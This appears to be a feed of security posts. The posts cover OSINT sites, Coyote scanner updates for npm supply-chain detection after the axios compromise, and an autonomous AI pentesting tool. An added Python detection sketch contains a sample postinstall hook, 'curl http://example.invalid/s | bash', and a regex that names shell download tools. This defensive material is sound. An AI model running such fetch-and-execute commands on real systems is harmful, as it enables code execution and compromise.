Here are a few of my favorite websites for OSINT/Web Recon:
1 - CentralOps https://t.co/J6EIvjvx4r
2 - ViewDNS https://t.co/qbhck39tQQ
3 - URLScan https://t.co/tvTG0kSEKb
4 - IP2Proxy https://t.co/y2x9H00xjA
5 - HostingThis https://t.co/9LTQ28f4gM
#OSINT
@wearehackerone +1 to this, and the landscape is changing constantly, so anyone who was an expert a few months ago might not be anymore. So much to constantly learn.
Just pushed a new update to Coyote as NPM-focused supply chain attacks seem to be on the rise. Here are the details on what was added:
- npm-specific supply chain detection added to Coyote's core scanner.
- New checks catch suspicious install-time lifecycle scripts like risky preinstall/postinstall behavior.
- The scanner now flags remote dependency sources in package.json, insecure .npmrc settings, and Node lockfiles that use plain HTTP or lack integrity hashes.
- Wired the new findings into scoring, attack path analysis, and test coverage so they affect real risk evaluation.
Done.
New update to Coyote that adds a scan for the axios/npm supply-chain attack, details below:
- add dedicated dependency findings for:
  - compromised releases `axios@1.14.1` and `axios@0.30.4`
  - IOC package `plain-crypto-js`
- include incident metadata, install-time execution context, and
  remediation guidance in dependency findings
- ensure supply-chain IOC findings still fail CI under
  `--deps-reachable-only` since this campaign executed at install time
- map new rule names into supply-chain attack-path analysis
- add tests for malicious axios releases, IOC package detection,
  gate behavior, and attack-path categorization
- update README dependency scan docs with Axios incident coverage
Google Threat Intelligence Group is tracking an active supply chain attack.
North Korea-nexus actor UNC1069 compromised the "axios" NPM package (v1.14.1 & 0.30.4), deploying the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.
Learn more: https://t.co/pII35aPpRA
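The npm checks listed in the two Coyote updates above (install-time lifecycle scripts, remote dependency sources, lockfile transport and integrity, and the axios / `plain-crypto-js` IOCs), sketched as an added Python example. This is not Coyote's code: the rule names, regex heuristics and sample data are assumptions constructed for illustration, and only the IOC names and versions come from this page.

```python
import re

# IOCs named on this page: two compromised axios releases and one IOC package.
COMPROMISED = {"axios": {"1.14.1", "0.30.4"}}
IOC_PACKAGES = {"plain-crypto-js"}
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Assumed heuristics for "risky" hook bodies and non-registry dependency specs.
RISKY_CMD = re.compile(r"\b(curl|wget|powershell|bash)\b|node\s+-e|base64")
REMOTE_SPEC = re.compile(r"^(https?://|git\+|git://|github:)")
# Constructed sample input (not from a real project).
SAMPLE_MANIFEST = {"scripts": {"postinstall": "curl http://example.invalid/s | bash"},
                   "dependencies": {"left": "git+https://example.invalid/left.git"}}
SAMPLE_LOCK = {"packages": {
    "": {"name": "demo"},
    "node_modules/axios": {"version": "1.14.1", "integrity": "sha512-CONSTRUCTED",
                           "resolved": "https://registry.npmjs.org/axios/-/axios-1.14.1.tgz"},
    "node_modules/a/node_modules/plain-crypto-js": {
        "version": "0.0.1", "resolved": "http://example.invalid/p.tgz"}}}


def scan_manifest(pkg):
    """Return (rule, detail) findings for a parsed package.json dict."""
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook)
        if cmd and RISKY_CMD.search(cmd):
            findings.append(("risky-install-script", f"{hook}: {cmd}"))
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in pkg.get(section, {}).items():
            if REMOTE_SPEC.match(spec):
                findings.append(("remote-dependency-source", f"{name} -> {spec}"))
    return findings


def scan_lockfile(lock):
    """Return findings for a parsed package-lock.json (lockfileVersion 2/3)."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path or meta.get("link"):  # skip root project and workspace links
            continue
        name = path.rsplit("node_modules/", 1)[-1]  # handles nesting and @scopes
        version = meta.get("version", "")
        if name in IOC_PACKAGES or version in COMPROMISED.get(name, ()):
            findings.append(("supply-chain-ioc", f"{name}@{version}"))
        if meta.get("resolved", "").startswith("http://"):
            findings.append(("plain-http-resolved", name))
        if "integrity" not in meta:
            findings.append(("missing-integrity", name))
    return findings
```

Because the IOC match runs on the lockfile rather than on import reachability, a transitive or nested copy of a flagged package is reported even when no project code imports it, which matches the install-time execution point made in the update above.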
Just pushed a new update to Coyote Security to GitHub, and working on a second one now as the axios/npm supply-chain-attack is a big deal, and a perfect place to use Coyote.
First, here's the update I just pushed that I'm pretty excited about, adding a core feature ppl have been asking for.
feat(remediation): add actionable remediation guidance to findings and reports
Add remediation text across the finding pipeline so scan output is not just
descriptive, but also tells users what to do next.
- extend PatternMatch with a remediation field
- add remediation text to all secret and smell patterns
- add sensitive-file remediation lookup helper
- populate remediation in scanner findings for sensitive files, secrets,
smells, entropy hits, gitignore issues, and large files
- add upgrade/monitor remediation for dependency vulnerability findings
- include remediation in JSON, Markdown, HTML, and SARIF outputs
- add remediation-focused tests covering patterns, reports, SARIF, and
sensitive file behavior
Validation:
- python3 -m unittest tests.test_remediation
Now live on GitHub.
PentAGI - Automated AI-Powered Pentesting Tool that Integrates 20+ Security Tools
Source: https://t.co/50TAGdMf5t
PentAGI introduces an AI-driven approach to penetration testing, automating complex workflows with tools like Nmap and Metasploit while generating detailed reports.
The tool stands out for its fully autonomous AI agents that dynamically plan and execute pentests, integrating over 20 professional security tools, including Nmap for network discovery, Metasploit for exploitation, and sqlmap for database attacks.
Users define a target, and PentAGI's multi-agent system, comprising researcher, developer, and executor roles, orchestrates the process, leveraging long-term memory to recall past successes and adapt strategies.
#cybersecuritynews
Just pushed a new update to Coyote, now live on GH.
Here's what's new:
Coyote can now generate CycloneDX v1.5 Software Bill of Materials from your dependency lockfiles. One command gives you a compliance-ready inventory across Python, npm, Go, and Rust projects.
- Supports requirements.txt, poetry.lock, package-lock.json, pnpm-lock.yaml, go.mod, and Cargo.lock
- Generates spec-compliant PURLs for every component with proper ecosystem normalization
- Dev dependencies excluded by default; opt in with --include-dev
- For a full supply chain security workflow: pairs with existing `coyote deps` and `coyote gate`
I built an open-source library of 700+ cybersecurity skills for AI coding agents -- covers DFIR, threat hunting, cloud security, and more https://t.co/vM5SgmXCrO